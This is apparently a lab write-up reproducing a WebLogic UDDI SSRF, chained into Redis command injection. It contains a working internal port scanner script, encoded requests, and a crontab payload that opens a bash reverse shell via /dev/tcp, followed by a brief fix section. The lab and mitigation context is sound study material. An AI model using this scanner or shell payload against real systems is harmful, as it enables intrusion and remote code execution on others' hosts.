WebLogic SSRF vulnerability reproduction

Vulnerability trigger point

The trigger is the operator parameter of the uddiexplorer/SearchPublicRegistries.jsp page: its value is used as the URL of a remote UDDI registry, and the server fetches that URL itself.

Scanning the intranet and probing ports

/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

When the port is open (here 7001, WebLogic itself), the response is:

An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: The server
at http://127.0.0.1:7001 returned a 404 error code (Not Found). Please
ensure that your URL is correct, and the web service has deployed
without error.

When the port is closed (probing port 7000 here), the response is:

An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: Tried all:
'1' addresses, but could not connect over HTTP to server: '127.0.0.1',
port: '7000'

Probing protocols

Probing a port with the dict:// scheme reports an unknown protocol:

An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: unknown protocol: dict

With the file:// scheme it returns this:

An error has occurred
java.lang.ClassCastException: sun.net.www.protocol.file.FileURLConnection cannot be cast to java.net.HttpURLConnection

So only the http scheme is usable for probing. The ClassCastException explains why: the UDDI client casts whatever URLConnection it opens to java.net.HttpURLConnection, so any handler other than HTTP either is rejected as an unknown protocol or fails at that cast.

Probing intranet IP addresses and ports

In a Docker-built lab the internal addresses usually start with 172.

operator=http://172.18.0.2:6379/

Response:

An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: Received a
response from url: http://172.18.0.2:6379 which did not have a valid
SOAP content-type: null.

This differs from the messages above. Probe one more port:

operator=http://172.18.0.2:22

An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: Tried all:
'1' addresses, but could not connect over HTTP to server: '172.18.0.2',
port: '22'

That shows port 6379 is open: "could not connect" on port 22 means the connection was refused, while "did not have a valid SOAP content-type: null" on 6379 means something accepted the connection but did not answer with HTTP.

6379 is the default Redis port, so the host probably runs Redis.

Try to read its configuration:

operator=http://172.18.0.2:6379/info

An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: Received a
response from url: http://172.18.0.2:6379/info which did not have a
valid SOAP content-type: null.

Same response as before, so the SSRF is probably blind: whatever Redis replies is not reflected in the page.

I also tried the gopher scheme, intending to use it against the internal Redis, but it reports unknown protocol: gopher. So gopher is out as well; only http remains.
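The error pages above are the only signal this blind SSRF gives, so it helps to turn them into explicit port states. The following Python is an added example and is not part of the original post or of DOUBLE–R's script; it classifies a response body into a verdict and builds the probe URL. The sample bodies are constructed from the error messages quoted in this section, and the verdict names (open-http, open-raw, closed, unreachable, unsupported-scheme) are my own labels.

```python
# Added example, not part of the original post: turn the uddiexplorer error page
# into a port-state verdict. The sample bodies below are constructed from the
# error messages quoted in this write-up.
import re
from urllib.parse import urlencode

SOAP_EXC = "weblogic.uddi.client.structures.exception.XML_SoapException"

# Ordered (regex, verdict) rules; the first match wins. Capture groups pull out
# the scheme, host/port or HTTP status so the caller can log them.
_RULES = [
    (r"unknown protocol: (?P<scheme>\w+)", "unsupported-scheme"),
    (r"cannot be cast to java\.net\.HttpURLConnection", "unsupported-scheme"),
    (r"No route to host", "unreachable"),
    (r"could not connect over HTTP to server: '(?P<host>[^']+)', port: '(?P<port>\d+)'", "closed"),
    (r"returned a (?P<status>\d{3}) error code", "open-http"),
    (r"did not have a valid SOAP content-type: (?P<ctype>[^\s.]+)", "open"),
]


def classify(body: str) -> dict:
    """Map one SearchPublicRegistries.jsp response body to a verdict dict."""
    text = " ".join(body.split())  # the page wraps the message; normalise whitespace
    if SOAP_EXC not in text and "java.lang.ClassCastException" not in text:
        return {"verdict": "no-error"}  # not the SSRF error page at all
    for pattern, verdict in _RULES:
        m = re.search(pattern, text)
        if not m:
            continue
        result = {"verdict": verdict, **m.groupdict()}
        if verdict == "open":
            # A null content-type means something accepted the TCP connection but
            # did not answer with HTTP (Redis, for example); a real content-type
            # means an HTTP server replied with a non-SOAP document.
            result["verdict"] = "open-raw" if result["ctype"] == "null" else "open-http"
        return result
    return {"verdict": "open-unclassified"}  # the exception fired, shape unknown


def probe_url(base: str, target: str) -> str:
    """Build the SSRF probe URL for one target: the fixed search fields from the
    write-up, with `target` placed in the operator parameter."""
    params = {
        "rdoSearch": "name", "txtSearchname": "sdf", "txtSearchkey": "",
        "txtSearchfor": "", "selfor": "Business location", "btnSubmit": "Search",
        "operator": target,
    }
    return base.rstrip("/") + "/uddiexplorer/SearchPublicRegistries.jsp?" + urlencode(params)


# Constructed sample responses, copied from the error pages shown above.
SAMPLES = {
    "http_404": "An error has occurred\n" + SOAP_EXC + ": The server\nat http://127.0.0.1:7001 "
                "returned a 404 error code (Not Found). Please\nensure that your URL is correct, "
                "and the web service has deployed\nwithout error.",
    "closed": "An error has occurred\n" + SOAP_EXC + ": Tried all:\n'1' addresses, but could not "
              "connect over HTTP to server: '127.0.0.1',\nport: '7000'",
    "redis": "An error has occurred\n" + SOAP_EXC + ": Received a\nresponse from url: "
             "http://172.18.0.2:6379 which did not have a valid\nSOAP content-type: null.",
    "dict": "An error has occurred\n" + SOAP_EXC + ": unknown protocol: dict",
    "file": "An error has occurred\njava.lang.ClassCastException: sun.net.www.protocol.file."
            "FileURLConnection cannot be cast to java.net.HttpURLConnection",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, "->", classify(body))
    print(probe_url("http://149.28.209.214:7001", "http://172.18.0.2:6379"))
```

Feeding each probe response through classify() instead of a single regex separates "refused" from "unreachable" and, more usefully, "open but not HTTP" (Redis, SSH banners) from "open HTTP", which is what decides the next step of the attack.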

Here is DOUBLE–R's scanning script:

# coding: utf-8
# SSRF scan for open ports on internal IPs (DOUBLE–R's script, ported to Python 3)

import argparse
import re
import threading
import time

import requests
import urllib3

urllib3.disable_warnings()  # verify=False below would otherwise warn on every request

# Ports worth checking from inside the network; 7001 is WebLogic, 6379 is Redis.
PORTS = ('21', '22', '23', '53', '80', '135', '139', '443', '445', '1080', '1433',
         '1521', '3306', '3389', '4899', '8080', '7001', '8000', '6389', '6379')

# This exception appears whenever the backend fetch failed; the two substrings
# checked in scan() mark the "nothing listening" cases.
SOAP_EXC = 'weblogic.uddi.client.structures.exception.XML_SoapException'


def ite_ip(ip):
    # Walk the /24 one host per thread, throttled so WebLogic is not flooded.
    for i in range(1, 256):
        final_ip = '{ip}.{i}'.format(ip=ip, i=i)
        print(final_ip)
        threading.Thread(target=scan, args=(final_ip,)).start()
        time.sleep(3)


def scan(final_ip):
    for port in PORTS:
        vul_url = (args.url + '/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s'
                   '&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor='
                   '&selfor=Business+location&btnSubmit=Search' % (final_ip, port))
        try:
            r = requests.get(vul_url, timeout=15, verify=False)
            result1 = re.findall(SOAP_EXC, r.text)
            result2 = re.findall('but could not connect', r.text)
            result3 = re.findall('No route to host', r.text)  # bugfix: do not report "no route to host" as open
            # Exception present but neither "could not connect" nor "no route": something answered.
            if len(result1) != 0 and len(result2) == 0 and len(result3) == 0:
                print('[!]' + final_ip + ':' + port)
        except Exception:
            pass


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Weblogic SSRF vulnerable exploit')
    parser.add_argument('--url', dest='url', required=True, help='Target url')
    parser.add_argument('--ip', dest='scan_ip', default='172.18.0.1',
                        help='Any address in the /24 to scan (default 172.18.0.1)')
    args = parser.parse_args()
    ip = '.'.join(args.scan_ip.split('.')[:-1])
    print(ip)
    ite_ip(ip)

Scan results

[... ~]# python neiwang.py --url 'http://149.28.209.214:7001'
172.18.0
172.18.0.1
172.18.0.2
[!]172.18.0.2:6379
172.18.0.3
172.18.0.4
[!]172.18.0.3:7001
172.18.0.5
172.18.0.6
172.18.0.7
[!]172.18.0.1:22

Getting a reverse shell through a crontab entry

Redis's inline protocol separates commands with line breaks (\r\n, URL-encoded as %0d%0a), so several commands can be smuggled into the path of the one HTTP request WebLogic sends.

The following four commands write a cron entry that bounces a shell:

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/172.18.0.1/21 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

URL-encode it:

>>> from urllib.parse import quote
>>> s = 'set 1 "\\n\\n\\n\\n* * * * * root bash -i >& /dev/tcp/172.18.0.1/21 0>&1\\n\\n\\n\\n"\r\nconfig set dir /etc/\r\nconfig set dbfilename crontab\r\nsave'
>>> quote(s)
'set%201%20%22%5Cn%5Cn%5Cn%5Cn%2A%20%2A%20%2A%20%2A%20%2A%20root%20bash%20-i%20%3E%26%20/dev/tcp/172.18.0.1/21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20/etc/%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave'

The \n sequences inside the quoted value must reach Redis as the two characters backslash and n (%5Cn), not as real newlines (%0A): Redis reads one inline command per line, so a raw newline would cut the set command short, whereas inside a double-quoted argument the server itself decodes \n back into a newline when it stores the value.

Pad it with a few arbitrary characters before and after. The leading test%0D%0A%0D%0A turns WebLogic's own request line (GET /test) into a junk command that Redis rejects without closing the connection, and the trailing %0D%0A%0D%0Aaaa does the same for the " HTTP/1.1" suffix and the request headers that follow:

test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.18.0.1%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

The full request:

GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.18.0.3:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.18.0.1%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

Shell obtained

[screenshot: the reverse shell connecting back]

I originally wanted to try the following RESP version, but there seems to be an extra newline in it; I built it with echo, and echo apparently appends a newline of its own.

*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$59%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/172.18.0.1/2333 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$5%0d%0a/etc/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$7%0d%0acrontab%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a

Files that can be written to obtain a reverse shell:

/etc/crontab

/etc/cron.d/*: any file dropped into this directory behaves like crontab and must use the same six-field format as /etc/crontab (schedule, user, command). Writing here gets a shell without overwriting any existing file.

/var/spool/cron/root: the root user's cron file on CentOS

/var/spool/cron/crontabs/root: the root user's cron file on Debian

Two caveats. The per-user spool files use the five-field format with no user column, so the "root" field in the payload above has to be dropped for them. And in practice this trick is reliable on CentOS but usually fails on Debian/Ubuntu: their cron ignores spool files whose mode is not 600 (Redis writes the dump with its default umask), is far less tolerant of the binary RDB header mixed into the file, and skips /etc/cron.d files whose names contain a dot.

Fix

# extract the WAR, remove the vulnerable JSP (and any other pages you do not need), repack without a manifest
mkdir uddiexplorer && cd uddiexplorer
jar -xvf ../uddiexplorer.war
rm SearchPublicRegistries.jsp
cd .. && jar -cvfM uddiexplorer.war -C uddiexplorer .

Removing the JSP is a stop-gap. uddiexplorer is a sample application with no role in production, so undeploy it entirely or apply Oracle's patch for this issue. Independently of that, restrict outbound connections from the WebLogic host and require authentication on internal Redis instances: it is the unauthenticated Redis, not the SSRF alone, that turns this into code execution.

References

https://doubler.cn/2018/09/13/Vulhub-Weblogic-SSRF/